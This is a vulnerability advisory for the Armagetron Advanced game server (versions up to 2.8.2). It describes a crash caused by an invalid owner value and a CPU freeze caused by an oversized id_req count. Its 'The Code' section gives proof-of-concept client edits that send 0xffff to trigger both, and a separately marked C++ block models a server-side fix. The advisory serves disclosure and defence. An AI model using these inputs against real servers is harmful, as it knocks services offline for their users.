#######################################################################

Luigi Auriemma

Application:  Armagetron Advanced
              http://armagetronad.net
Versions:     <= 2.8.2 and current SVN
Platforms:    Windows, *nix, *BSD, Mac and more
Bugs:         A] crash through an invalid owner value
              B] freeze through invalid num in id_req_handler
Exploitation: remote, versus server
Date:         16 Jul 2006
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Armagetron Advanced is a well known action game inspired by the famous Tron movie.

#######################################################################

=======
2) Bugs
=======

---------------------------------------
A] crash through an invalid owner value
---------------------------------------

The program terminates, or crashes, when a client sends an owner value greater than MAXCLIENTS+1.
The function which reads this value is the following, located in network/nNetObject.cpp:

  nNetObject::nNetObject(nMessage &m):lastSyncID_(m.MessageIDBig()),refCtr_(0)

If the value is not excessively big, the server terminates with the following message:

  Internal Error: Internal error in static nMachine& nMachine::GetMachine (short unsigned int) in network/nNetwork.cpp:3820 :
  Assertion userID <= MAXCLIENTS+1 failed

-----------------------------------------------
B] freeze through invalid num in id_req_handler
-----------------------------------------------

A client can freeze the server by sending a big num value (like 0x7fff or 0xffff) to the id_req_handler function used by the server in network/nNetObject.cpp.
The server freezes and remains frozen with the CPU at 100%.
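The two checks a server-side fix needs, as an added example in plain C++ that is not Armagetron's own code: a constructed stand-in for nMessage, an owner read that drops out-of-range values before anything like nMachine::GetMachine can assert on them, and an id_req handler that clamps the requested count. The MAXCLIENTS and ID_PREFETCH values, the Message struct and the function names are assumptions made for this model.

```cpp
#include <cstdint>
#include <cstddef>
#include <vector>

// Assumed values for this model only; the real constants live in the game's sources.
static const int MAXCLIENTS  = 16;
static const int ID_PREFETCH = 50;

// Constructed stand-in for nMessage: a sequence of 16-bit words read in order.
struct Message {
    std::vector<uint16_t> words;
    size_t pos;
    explicit Message(const std::vector<uint16_t> &w) : words(w), pos(0) {}
    bool Read(uint16_t &out) {
        if (pos >= words.size()) return false;   // truncated message
        out = words[pos++];
        return true;
    }
};

// Bug A: validate the owner field of a create message before it can reach
// nMachine::GetMachine, whose assertion (userID <= MAXCLIENTS+1) otherwise
// terminates the server. Returns the owner, or -1 when the message must be dropped.
int ReadCreateOwner(const std::vector<uint16_t> &words) {
    Message m(words);
    uint16_t id = 0, owner = 0;
    if (!m.Read(id) || !m.Read(owner)) return -1;   // too short: drop
    if (owner > MAXCLIENTS + 1) return -1;          // out of range: drop, do not assert
    return owner;
}

// Bug B: bound the count in an id_req message so that a client asking for
// 0x7fff or 0xffff ids cannot keep the handler looping at 100% CPU.
// Returns the ids actually granted, starting at firstId.
std::vector<uint16_t> HandleIdReq(const std::vector<uint16_t> &words, uint16_t firstId) {
    Message m(words);
    std::vector<uint16_t> ids;
    uint16_t num = 0;
    if (!m.Read(num)) return ids;
    if (num > ID_PREFETCH) num = ID_PREFETCH;       // clamp to the server's own prefetch size
    for (uint16_t i = 0; i < num; ++i) ids.push_back(static_cast<uint16_t>(firstId + i));
    return ids;
}
```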
#######################################################################

===========
3) The Code
===========

A] add a customized owner value in WriteCreate in network/nNetObject.cpp:

  void nNetObject::WriteCreate(nMessage &m){
    m.Write(id);
    // m.Write(owner);
    m.Write(0xffff);

B] add a customized value in first_fill_ids in network/nNetObject.cpp:

  tJUST_CONTROLLED_PTR< nMessage > m = new nMessage(id_req);
  // m->Write(ID_PREFETCH - 10);
  m->Write(0xffff);

#######################################################################

======
4) Fix
======

A patched version will be released soon.

#######################################################################